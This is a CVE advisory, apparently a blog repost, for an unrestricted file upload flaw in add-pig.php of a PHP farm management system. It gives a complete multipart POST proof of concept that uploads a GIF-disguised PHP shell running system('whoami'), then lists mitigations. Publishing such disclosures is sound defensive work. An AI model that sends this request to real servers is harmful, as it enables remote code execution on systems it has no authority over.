CVE-2025-0582

Itsourcecode Farm Management System In PHP v1.0 add-pig.php Unrestricted Upload

NAME OF AFFECTED PRODUCT(S)

  • Farm Management System In PHP

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • zzz,xiongbaojiang

Vulnerable File

  • add-pig.php

VERSION(S)

  • V1.0

PROBLEM TYPE

Vulnerability Type

  • Unrestricted Upload

Root Cause

In the add-pig.php file of the "Farm Management System In PHP" project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.

Vulnerability Path

In the add-pig.php file of the "Farm Management System In PHP" project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.

Key Parameter:

  • Parameter : $res1_name

  • File Name : farm management system/add-pig.php

  • Line Number: 37

    复制代码
    $res1_name = basename($_FILES['pigphoto']['name']);

File Upload:

  • Trigger Path: Arbitrary File Upload/Write

  • File Name : farm management system/add-pig.php

  • Line Number: 45

    move = move_uploaded_file(tmp_name, location.res1_name);

Vulnerability POC

复制代码
POST /farm123/add-pig.php HTTP/1.1
Host: farm
Content-Type: multipart/form-data; boundary=---------------------------85676068117477891701865867569
Content-Length: 1468

-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigno"

pig-fms-2793
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="weight"

1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="arrived"

2024-12-17
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="gender"

male
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="status"

active
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="breed"

23
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="remark"

1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream

GIF89a;

<?php 
system('whoami');
?>
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="submit"


-----------------------------85676068117477891701865867569--

Payload:

复制代码
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream

GIF89a;

<?php 
system('whoami');
?>

The following are screenshots of some specific information obtained from testing and running with the yakit tool:


复制代码
/uploadfolder/test.php

Recommendations for Vulnerability Mitigation

  1. File Type Validation: Limit the allowed file types (e.g., only allow image formats) before processing uploads.
  2. File Name Sanitization: Clean and rename uploaded files to avoid using user-provided names directly.
  3. Use Temporary Directory: Store uploaded files in a temporary directory and conduct security checks after processing.
  4. Permission Control: Ensure correct permission settings on the upload directory to prevent direct execution of uploaded files.
  5. Input Validation: Rigorously validate all user inputs to ensure security.
相关推荐
独行soc6 小时前
2025年渗透测试面试题总结-66(题目+回答)
java·网络·python·安全·web安全·adb·渗透测试
王火火(DDoS CC防护)10 小时前
网站漏洞扫描要怎么处理?
web安全·网络安全
ZZHow10241 天前
CTF-Web手的百宝箱
web安全·网络安全
Rum_0M2 天前
服务器内部信息获取
运维·服务器·web安全·网络安全·信息安全·职业技能大赛
心 一2 天前
Web安全基石:深入理解与防御越权问题
网络·安全·web安全
ZZHow10242 天前
sqlmap常用命令
web安全·网络安全
2301_780789662 天前
渗透测试真的能发现系统漏洞吗
服务器·网络·安全·web安全·网络安全
在安全厂商修设备3 天前
XSS 跨站脚本攻击剖析与防御 - 第一章:XSS 初探
web安全·网络安全·xss
独行soc3 天前
2025年渗透测试面试题总结-60(题目+回答)
java·python·安全·web安全·adb·面试·渗透测试
FreeBuf_3 天前
Spring Cloud Gateway WebFlux现cvss10分高危漏洞,可导致环境属性篡改
安全·web安全